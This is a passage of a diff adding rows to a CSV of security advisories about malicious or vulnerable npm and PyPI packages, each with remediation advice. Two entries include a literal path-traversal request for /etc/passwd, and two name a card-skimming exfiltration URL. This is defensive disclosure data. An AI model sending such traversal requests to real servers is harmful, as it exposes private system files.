+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-ftp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1137'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m6q2-9pfm-2wvr,2021-10-04T15:56:06Z,2020-09-03T17:02:49Z,,[],Malicious Package in wallet-address-vaildator,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wallet-address-vaildator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1412'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hx2x-85gr-wrpq,2021-08-26T15:20:18Z,2020-09-25T18:29:00Z,,['CVE-2020-15212'],Out of bounds access in tensorflow-lite,"### Impact
+In TensorFlow Lite models using segment sum can trigger writes outside of bounds of heap allocated buffers by inserting negative elements in the segment ids tensor:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631
+
+Users having access to `segment_ids_data` can alter `output_index` and then write to outside of `output_data` buffer.
+
+This might result in a segmentation fault but it can also be used to further corrupt the memory and can be chained with other vulnerabilities to create more advanced exploits.
+
+### Patches
+We have patched the issue in 204945b and will release patch releases for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
+
+### Workarounds
+A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that the segment ids are all positive, although this only handles the case when the segment ids are stored statically in the model.
+
+A similar validation could be done if the segment ids are generated at runtime between inference steps.
+
+If the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been discovered from a variant analysis of [GHSA-p2cq-cprg-frvm](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p2cq-cprg-frvm).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hx2x-85gr-wrpq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15212'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/204945b19e44b57906c9344c0d00120eeeae178a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:27:17Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-66mv-xh68-h6v2,2020-08-31T19:00:58Z,2020-09-03T15:48:53Z,,[],Denial of Service in @commercial/hapi,"Affected versions of `@commercial/hapi` are vulnerable to Denial of Service. The CORS request handler has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to versions 16.8.2, 17.9.2, 18.4.1, 19.1.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@commercial/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '16.8.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@commercial/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '17.0.0'}, {'fixed': '17.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@commercial/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '18.0.0'}, {'fixed': '18.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@commercial/hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0.0'}, {'fixed': '19.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1483'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gg6m-fhqv-hg56,2021-09-23T21:04:51Z,2020-09-01T15:15:36Z,,['CVE-2014-4179'],Denial of Service in yar,"Versions of `yar` prior to 2.2.0 are affected by a denial of service vulnerability related to an invalid encrypted session cookie value.
+
+When an invalid encryped session cookie value is provided, the process will crash.
+
+
+## Recommendation
+
+Update to version 2.2.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'yar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-4179'}, {'type': 'WEB', 'url': 'https://github.com/spumko/yar/issues/34'}, {'type': 'PACKAGE', 'url': 'https://github.com/spumko/yar/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/44'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4rgj-8mq3-hggj,2020-08-31T18:49:38Z,2020-09-03T20:32:11Z,,[],Denial of Service in @hapi/subtext,"Versions of `@hapi/subtext` prior to 6.1.2 are vulnerable to Denial of Service (DoS). The package fails to enforce the `maxBytes` configuration for payloads with chunked encoding that are written to the file system. This allows attackers to send requests with arbitrary payload sizes, which may exhaust system resources leading to Denial of Service.
+
+
+## Recommendation
+
+Upgrade to version 6.1.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hapijs/subtext/issues/72'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1165'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8g3r-968r-c644,2021-10-01T14:37:54Z,2020-09-03T23:15:58Z,,[],Malicious Package in jw-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jw-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1296'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ccw5-7vfh-p5hm,2023-09-13T23:06:35Z,2020-09-01T18:14:15Z,,['CVE-2017-16208'],Directory Traversal in dmmcquay.lab6,"Affected versions of `dmmcquay.lab6` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dmmcquay.lab6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16208'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dmmcquay.lab6'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/426'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6584-gfwm-3vc3,2021-09-29T20:54:03Z,2020-09-03T21:43:01Z,,[],Malicious Package in budfer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'budfer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1233'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8qh7-xw58-3ww7,2023-07-27T20:14:43Z,2020-09-11T21:25:37Z,,[],Malicious Package in radic-util,"Version 1.0.2 of `radic-util` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'radic-util'}, 'versions': ['1.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/942'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g9wg-wq4f-2x5w,2020-08-31T18:46:53Z,2020-09-03T19:00:10Z,,[],Cross-Site Scripting in console-feed,"Versions of `console-feed` prior to 2.8.10 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly escape the rendered output. If an application uses `console-feed` and a malicious JavaScript payload was passed to a `console.log('%_', payload)` call, the package would render HTML containing the malicious payload.
+
+
+## Recommendation
+
+Upgrade to version 2.8.10 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'console-feed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1088'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hg7w-2pf7-mxm2,2021-10-04T16:37:42Z,2020-09-03T17:02:31Z,,[],Malicious Package in wbe3,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wbe3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1414'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7r9x-hr76-jr96,2020-08-31T18:59:37Z,2020-09-04T17:26:18Z,,[],Command Injection in giting,"All versions of `gitting` are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an `exec` call, which may allow attackers to execute arbitrary code in the system. The `pull` function is vulnerable through the `branch` variable.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'giting'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1446'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c3hr-wwh3-qm54,2023-09-07T00:09:46Z,2020-09-01T16:47:09Z,,['CVE-2017-16090'],Directory Traversal in fsk-server,"Affected versions of `fsk-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'fsk-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16090'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/fsk-server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/345'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v5hp-35hw-cw5x,2021-09-23T21:32:40Z,2020-09-01T15:33:10Z,,['CVE-2016-1000230'],XSS in client rendered block templates in rendr,"Affected versions of `rendr` are vulnerable to cross-site scripting when client side rendering is done inside a `_block`.
+
+Server side rendering is not affected and is properly escaped.
+
+
+## Recommendation
+
+Update to version 1.1.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rendr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000230'}, {'type': 'WEB', 'url': 'https://github.com/rendrjs/rendr-handlebars/pull/61'}, {'type': 'WEB', 'url': 'https://github.com/rendrjs/rendr/pull/513'}, {'type': 'PACKAGE', 'url': 'https://github.com/rendrjs/rendr-handlebars'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/128'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j3qq-qvc8-c6g7,2021-10-01T13:29:49Z,2020-09-01T21:15:09Z,,[],Malicious Package in foever,"All versions of `foever` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'foever'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/688'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7p6w-x2gr-rrf8,2021-09-27T21:42:28Z,2020-09-02T21:28:05Z,,[],Cross-Site Scripting in ag-grid-community,"Versions of `ag-grid-community` prior to 14.0.0 are vulnerable to Cross-Site Scripting (XSS). Grid contents are not properly sanitized and may allow attackers to execute arbitrary JavaScript if user input is rendered in the grid.
+
+
+## Recommendation
+
+Upgrade to version 14.0.0 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'ag-grid-community'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ag-grid/ag-grid/issues/1961'}, {'type': 'PACKAGE', 'url': 'https://github.com/ag-grid/ag-grid'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/894'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3f97-rj68-2pjf,2021-09-29T20:57:28Z,2020-09-03T21:48:35Z,,[],Malicious Package in buffe2-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffe2-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1238'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6qgx-f452-7699,2021-10-01T17:07:59Z,2020-09-03T23:28:39Z,,[],Malicious Package in superhappyfuntime,"All versions of `superhappyfuntime` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'superhappyfuntime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1314'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r9q4-w3fm-wrm2,2021-09-27T21:01:47Z,2020-09-02T21:21:43Z,,[],Cross-Site Scripting in google-closure-library,"Versions of `google-closure-library` prior to 20190301.0.0 are vulnerable to Cross-Site Scripting. The `safedomtreeprocessor.processToString()` function improperly processed empty elements, which could allow attackers to execute arbitrary JavaScript through Mutation Cross-Site Scripting.
+
+
+## Recommendation
+
+Upgrade to version 20190301.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'google-closure-library'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20190301.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa#commitcomment-33294853'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/closure-library'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GOOGLECLOSURELIBRARY-174519'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/878'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2q6w-rxf3-4wc9,2021-09-24T16:54:22Z,2020-09-01T19:49:18Z,,[],Malicious Package in codify,"Version 0.3.1 of `codify` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.3.1 of this module is found installed you will want to replace it with a version before or after 0.3.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'codify'}, 'versions': ['0.3.1']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/bozuko/codify'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CODIFY-451005'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/620'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h97g-4mx7-5p2p,2021-09-28T21:18:57Z,2020-09-03T17:11:36Z,,[],Open Redirect in apostrophe,"Versions of `apostrophe` prior to 2.92.0 are vulnerable to Open Redirect. The package redirected requests to third-party websites if escaped URLs followed by a trailing `/` were appended at the end.
+
+
+
+## Recommendation
+
+Update to version 2.92.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.92.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apostrophecms/apostrophe/commit/1eba144bb82bd43dab72ce36cfbd593361b6d9b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/apostrophe'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-APOSTROPHE-451089'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1029'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5327-gfq5-8f4m,2021-09-29T21:04:17Z,2020-09-03T21:56:23Z,,[],Malicious Package in buffer-xmr,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xmr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1246'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4q8f-5xxj-946r,2020-08-31T18:41:49Z,2020-09-03T02:40:51Z,,[],Command Injection in addax,"Versions of `addax` prior to 1.1.0 are vulnerable to Command Injection. The package does not validate user input on the `presignPath` function which receives input directly from the API endpoint. Exploiting the vulnerability requires authentication. This may allow attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+Upgrade to version 1.1.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'addax'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/954'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-692h-g37c-qv44,2021-10-01T16:15:23Z,2020-09-03T23:25:30Z,,[],Malicious Package in sj-tw-sec,"All versions of `sj-tw-sec` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sj-tw-sec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1309'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cg48-9hh2-x6mx,2021-09-27T20:53:56Z,2020-09-02T18:28:58Z,,[],HTML Injection in preact,"Versions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization.
+
+
+## Recommendation
+
+Upgrade to version 10.0.0-beta.1.",[],"[{'package': {'ecosystem': 'npm', 'name': 'preact'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-alpha.0'}, {'fixed': '10.0.0-beta.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.0-beta.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/developit/preact/pull/1528'}, {'type': 'PACKAGE', 'url': 'https://github.com/developit/preact'}, {'type': 'WEB', 'url': 'https://github.com/developit/preact/releases/tag/10.0.0-beta.1'}, {'type': 'WEB', 'url': 'https://medium.com/dailyjs/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/835'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4hm7-73ch-vm59,2021-09-29T20:58:16Z,2020-09-03T21:49:43Z,,[],Malicious Package in buffer-8or,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-8or'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1241'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-88h9-fc6v-jcw7,2020-08-31T18:49:17Z,2020-09-03T20:28:51Z,,[],Unintended Require in larvitbase-www,"All versions of `larvitbase-www` are vulnerable to an Unintended Require. The package exposes an API endpoint and passes a GET parameter unsanitized to an `require()` call. This allows attackers to execute any `.js` file in the same folder as the server is running.
+
+
+## Recommendation
+
